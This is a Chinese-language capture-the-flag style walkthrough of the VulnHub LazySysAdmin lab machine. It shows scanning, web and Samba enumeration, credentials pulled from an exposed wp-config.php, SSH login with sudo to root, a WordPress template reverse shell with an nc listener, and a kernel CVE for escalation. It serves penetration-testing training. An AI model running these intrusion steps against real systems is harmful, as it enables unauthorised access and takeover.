渗透测试 | VulnHub – LazySysAdmin
字数 1568 2025-08-18 11:39:30
VulnHub - LazySysAdmin 渗透测试详细指南
1. 环境准备
1.1 下载目标环境
- 下载链接:
- 主链接: Google Drive
- 镜像链接: VulnHub
- Torrent链接: 磁力链接
1.2 运行环境
- VirtualBox 或 VMware Workstation Player
2. 初始信息收集
2.1 IP探测
使用netdiscover扫描同一网段内的主机:
netdiscover -i wlo1
示例输出:
192.168.0.100 08:00:27:da:8a:ac 1 42 PCS Systemtechnik GmbH
2.2 端口扫描
使用masscan快速扫描:
masscan 192.168.0.100 -p 1-10000 --rate=1000
发现开放端口:3306, 6667, 22, 139, 80, 445
使用nmap详细扫描:
nmap -T4 -A -v 192.168.0.100 -p 0-10000
详细扫描结果:
- 22/tcp: OpenSSH 6.6.1p1 Ubuntu
- 80/tcp: Apache httpd 2.4.7 (Ubuntu)
- 139/tcp: Samba smbd 3.X - 4.X
- 445/tcp: Samba smbd 4.3.11-Ubuntu
- 3306/tcp: MySQL (未授权)
- 6667/tcp: InspIRCd
3. Web服务枚举
3.1 目录爆破
使用dirb工具:
./dirb http://192.168.0.100 wordlists/common.txt -o result.txt
3.2 robots.txt发现
访问http://192.168.0.100/robots.txt发现以下目录:
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/
3.3 Web服务器信息
curl -I 192.168.0.100
输出:
HTTP/1.1 200 OK
Server: Apache/2.4.7 (Ubuntu)
3.4 重要发现
dirb扫描结果中发现:
- WordPress路径:
/wordpress/ - phpMyAdmin路径:
/phpmyadmin/
4. WordPress扫描
使用wpscan扫描WordPress:
wpscan http://192.168.0.100/wordpress
关键发现:
- WordPress版本: 4.8.5
- 主题: twentyfifteen v1.8
- 注册功能开启
- XML-RPC接口可用
- 上传目录和includes目录存在目录遍历
5. Samba服务枚举
使用enum4linux工具:
enum4linux 192.168.0.100
关键发现:
- 共享资源:
- print$ (访问被拒绝)
- share$ (可访问)
- IPC$ (IPC服务)
- 用户信息:
- Unix User\togie (Local User)
- LAZYSYSADMIN\nobody (Local User)
5.1 访问共享资源
Windows下:
net use k: \\192.168.0.100\share$
Linux下:
mount -t cifs -o username='',password='' //192.168.0.100/share$ /mnt
发现重要文件:
- deets.txt
- wp-config.php
从wp-config.php中获取MySQL凭据:
define('DB_USER', 'Admin');
define('DB_PASSWORD', 'TogieMYSQL12345^^');
6. 渗透路径
路径一:SSH登录
尝试使用以下凭据登录SSH:
- 用户名: togie
- 密码: 12345 (从deets.txt中发现)
成功登录后:
togie@LazySysAdmin:~$ whoami
togie
togie@LazySysAdmin:~$ sudo su
[sudo] password for togie: 12345
root@LazySysAdmin:/home/togie# id
uid=0(root) gid=0(root) groups=0(root)
路径二:WordPress反弹shell
-
使用获取的MySQL凭据登录WordPress后台:
- 用户名: Admin
- 密码: TogieMYSQL12345^^
-
编辑404.php模板,插入PHP反弹shell代码
-
访问触发页面:
http://192.168.0.100/wordpress/?p=2 -
本地监听:
nc -vlp 1234 -
获取shell后提升权限:
python -c 'import pty; pty.spawn("/bin/sh")'
7. 提权方法
7.1 系统信息
uname -r
# 输出: 4.4.0-31-generic
lsb_release -a
# 输出: Ubuntu 14.04.5 LTS
7.2 可能的提权漏洞
- CVE-2017-1000112 (适用于Linux内核4.4.0-31-generic)
- 由于目标机没有gcc,需在本地编译exp后上传执行
8. 最终目标
获取root权限后查看证明文件:
cat /root/proof.txt
9. 工具安装
dirb安装方法(Kali已自带):
wget https://svwh.dl.sourceforge.net/project/dirb/dirb/2.22/dirb222.tar.gz
tar zxvf dirb222.tar.gz
cd dirb222/
apt-get install libcurl4-gnutls-dev
./configure && make
10. 关键总结
- 信息收集是关键,特别是端口扫描和目录爆破
- 不要忽视看似简单的密码(如12345)
- 共享资源可能包含重要信息
- WordPress配置文件常包含数据库凭据
- 多尝试不同的渗透路径
- 提权前先收集系统详细信息